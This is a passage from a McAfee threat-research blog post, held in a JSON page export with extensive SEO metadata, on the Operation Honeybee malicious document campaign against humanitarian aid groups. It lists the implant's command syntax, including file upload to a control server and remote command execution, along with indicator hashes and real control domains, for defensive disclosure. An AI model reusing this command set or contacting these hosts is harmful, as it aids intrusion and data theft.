looks for any files with the keywords:<\/p>\n<ul>\n<li>TO EVERYONE: Commands issued to all infected endpoints<\/li>\n<li>TO &lt;COMPUTERNAME&gt;: Commands issued to endpoints matching the ComputerName<\/li>\n<\/ul>\n<p>The following commands are supported by the malware implant:<\/p>\n<ul>\n<li>cmd \/c pull &lt;filename&gt;: Adds filename to temp.zip, Base64 encodes, and uploads to control server<\/li>\n<li>cmd \/c chip &lt;string&gt;: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.<\/li>\n<li>cmd \/c put &lt;new_file_name&gt; &lt;existing_file_name&gt;: Copies existing file to new file name. Deletes existing file.<\/li>\n<li>\/user &lt;parameters&gt;: Executes downloaded file with parameters specified using CreateProcessAsUser<\/li>\n<li>cmd \/c &lt;command&gt;: Executes command on infected endpoint<strong>\u00a0<\/strong><\/li>\n<\/ul>\n<h2><strong>Conclusion<\/strong><strong>\u00a0<\/strong><\/h2>\n<p>The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean speaker.<\/p>\n<p>The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.<\/p>\n<p>Based on the McAfee Advanced Threat Research team\u2019s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor. Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild.<\/p>\n<h2><em><strong>Indicators of compromise<\/strong><\/em><\/h2>\n<h4><strong>MITRE ATT&amp;CK techniques<\/strong><\/h4>\n<ul>\n<li>Modify existing service<\/li>\n<li>Code signing<\/li>\n<li>File deletion<\/li>\n<li>Deobfuscate\/decode files or information<\/li>\n<li>System information discovery<\/li>\n<li>Process discovery<\/li>\n<li>Service execution<\/li>\n<li>RunDLL32<\/li>\n<li>Scripting<\/li>\n<li>Command-line Interface<\/li>\n<li>Data from local system<\/li>\n<li>Automated exfiltration<\/li>\n<li>Data encrypted<\/li>\n<li>Commonly used port<\/li>\n<li>Bypass user account control<\/li>\n<\/ul>\n<h4><strong>Hashes<\/strong><\/h4>\n<ul>\n<li>fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3<\/li>\n<li>f684e15dd2e84bac49ea9b89f9b2646dc32a2477<\/li>\n<li>1d280a77595a2d2bbd36b9b5d958f99be20f8e06<\/li>\n<li>19d9573f0b2c2100accd562cc82d57adb12a57ec<\/li>\n<li>f90a2155ac492c3c2d5e1d83e384e1a734e59cc0<\/li>\n<li>9b832dda912cce6b23da8abf3881fcf4d2b7ce09<\/li>\n<li>f3b62fea38cb44e15984d941445d24e6b309bc7b<\/li>\n<li>66d2cea01b46c3353f4339a986a97b24ed89ee18<\/li>\n<li>7113aaab61cacb6086c5531a453adf82ca7e7d03<\/li>\n<li>d41daba0ebfa55d0c769ccfc03dbf6a5221e006a<\/li>\n<li>25f4819e7948086d46df8de2eeeaa2b9ec6eca8c<\/li>\n<li>35ab747c15c20da29a14e8b46c07c0448cef4999<\/li>\n<li>e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42<\/li>\n<li>0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0<\/li>\n<li>bca861a46d60831a3101c50f80a6d626fa99bf16<\/li>\n<li>01530adb3f947fabebae5d9c04fb69f9000c3cef<\/li>\n<li>4229896d61a5ad57ed5c247228606ce62c7032d0<\/li>\n<li>4c7e975f95ebc47423923b855a7530af52977f57<\/li>\n<li>5a6ad7a1c566204a92dd269312d1156d51e61dc4<\/li>\n<li>1dc50bfcab2bc80587ac900c03e23afcbe243f64<\/li>\n<li>003e21b02be3248ff72cc2bfcd05bb161b6a2356<\/li>\n<li>9b7c3c48bcef6330e3086de592b3223eb198744a<\/li>\n<li>85e2453b37602429596c9681a8c58a5c6faf8d0c<\/li>\n<\/ul>\n<h3><strong>Domains<\/strong><\/h3>\n<ul>\n<li>ftp.byethost31.com<\/li>\n<li>ftp.byethost11.com<\/li>\n<li>1113427185.ifastnet.org<\/li>\n<li>navermail.byethost3.com<\/li>\n<li>nihon.byethost3.com<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have&#8230;<\/p>\n","protected":false},"author":911,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1411,5526,4452,180,4185],"coauthors":[2544],"class_list":["post-84860","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-advanced-persistent-threats","tag-advanced-threat-research","tag-cybersecurity","tag-malware","tag-phishing"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog<\/title>\n<meta name=\"description\" content=\"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog\" \/>\n<meta property=\"og:description\" content=\"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2018-03-02T13:00:10+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-06-03T03:38:01+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\" \/>\n\t<meta property=\"og:image:width\" content=\"1253\" \/>\n\t<meta property=\"og:image:height\" content=\"847\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Ryan Sherstobitoff\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@r_sherstobitoff\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ryan Sherstobitoff\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\"},\"author\":{\"name\":\"Ryan Sherstobitoff\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\"},\"headline\":\"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups\",\"datePublished\":\"2018-03-02T13:00:10+00:00\",\"dateModified\":\"2025-06-03T03:38:01+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\"},\"wordCount\":2206,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\",\"keywords\":[\"advanced persistent threats\",\"Advanced Threat Research\",\"cybersecurity\",\"malware\",\"Phishing\"],\"articleSection\":[\"McAfee Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\",\"name\":\"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\",\"datePublished\":\"2018-03-02T13:00:10+00:00\",\"dateModified\":\"2025-06-03T03:38:01+00:00\",\"description\":\"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage\",\"url\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\",\"contentUrl\":\"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\",\"name\":\"Ryan Sherstobitoff\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/b9bc99b6021883cbf5794b450795dc55\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"caption\":\"Ryan Sherstobitoff\"},\"description\":\"Ryan Sherstobitoff is a Senior Analyst for Major Campaigns \u2013 Advanced Threat Research in McAfee. Ryan specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where he managed the US strategic response for new and emerging threats. Ryan is widely recognized as a security &amp; cloud computing expert throughout the country.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/in\/ryan-sherstobitoff-a1334a5\/\",\"https:\/\/x.com\/r_sherstobitoff\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/ryan-sherstobitoff\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog","description":"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"og_locale":"en_US","og_type":"article","og_title":"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog","og_description":"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have","og_url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/","og_site_name":"McAfee Blog","article_publisher":"https:\/\/www.facebook.com\/McAfee\/","article_published_time":"2018-03-02T13:00:10+00:00","article_modified_time":"2025-06-03T03:38:01+00:00","og_image":[{"width":1253,"height":847,"url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png","type":"image\/png"}],"author":"Ryan Sherstobitoff","twitter_card":"summary_large_image","twitter_creator":"@r_sherstobitoff","twitter_site":"@McAfee","twitter_misc":{"Written by":"Ryan Sherstobitoff","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#article","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/"},"author":{"name":"Ryan Sherstobitoff","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035"},"headline":"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups","datePublished":"2018-03-02T13:00:10+00:00","dateModified":"2025-06-03T03:38:01+00:00","mainEntityOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/"},"wordCount":2206,"publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png","keywords":["advanced persistent threats","Advanced Threat Research","cybersecurity","malware","Phishing"],"articleSection":["McAfee Labs"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/","url":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/","name":"McAfee Uncovers Operation Honeybee, a Malicious Campaign Targeting Humanitarian Aid Groups | McAfee Blog","isPartOf":{"@id":"https:\/\/www.mcafee.com\/blogs\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage"},"thumbnailUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png","datePublished":"2018-03-02T13:00:10+00:00","dateModified":"2025-06-03T03:38:01+00:00","description":"This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.\u00a0 McAfee Advanced Threat Research analysts have","breadcrumb":{"@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#primaryimage","url":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png","contentUrl":"https:\/\/securingtomorrow.mcafee.com\/wp-content\/uploads\/2018\/02\/20180227-Honeybee-timeline-1.png"},{"@type":"BreadcrumbList","@id":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Blog","item":"https:\/\/www.mcafee.com\/blogs\/"},{"@type":"ListItem","position":2,"name":"Other Blogs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/"},{"@type":"ListItem","position":3,"name":"McAfee Labs","item":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/"},{"@type":"ListItem","position":4,"name":"McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups"}]},{"@type":"WebSite","@id":"https:\/\/www.mcafee.com\/blogs\/#website","url":"https:\/\/www.mcafee.com\/blogs\/","name":"McAfee Blog","description":"Internet Security News","publisher":{"@id":"https:\/\/www.mcafee.com\/blogs\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.mcafee.com\/blogs\/#organization","name":"McAfee","url":"https:\/\/www.mcafee.com\/blogs\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png","width":1286,"height":336,"caption":"McAfee"},"image":{"@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/McAfee\/","https:\/\/x.com\/McAfee","https:\/\/www.linkedin.com\/company\/mcafee\/","https:\/\/www.youtube.com\/McAfee"]},{"@type":"Person","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035","name":"Ryan Sherstobitoff","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/b9bc99b6021883cbf5794b450795dc55","url":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg","contentUrl":"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg","caption":"Ryan Sherstobitoff"},"description":"Ryan Sherstobitoff is a Senior Analyst for Major Campaigns \u2013 Advanced Threat Research in McAfee. Ryan specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where he managed the US strategic response for new and emerging threats. Ryan is widely recognized as a security &amp; cloud computing expert throughout the country.","sameAs":["https:\/\/www.linkedin.com\/in\/ryan-sherstobitoff-a1334a5\/","https:\/\/x.com\/r_sherstobitoff"],"url":"https:\/\/www.mcafee.com\/blogs\/author\/ryan-sherstobitoff\/"}]}},"_links":{"self":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/84860","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/users\/911"}],"replies":[{"embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/comments?post=84860"}],"version-history":[{"count":2,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/84860\/revisions"}],"predecessor-version":[{"id":214973,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/posts\/84860\/revisions\/214973"}],"wp:attachment":[{"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/media?parent=84860"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/categories?post=84860"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/tags?post=84860"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.mcafee.com\/blogs\/wp-json\/wp\/v2\/coauthors?post=84860"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}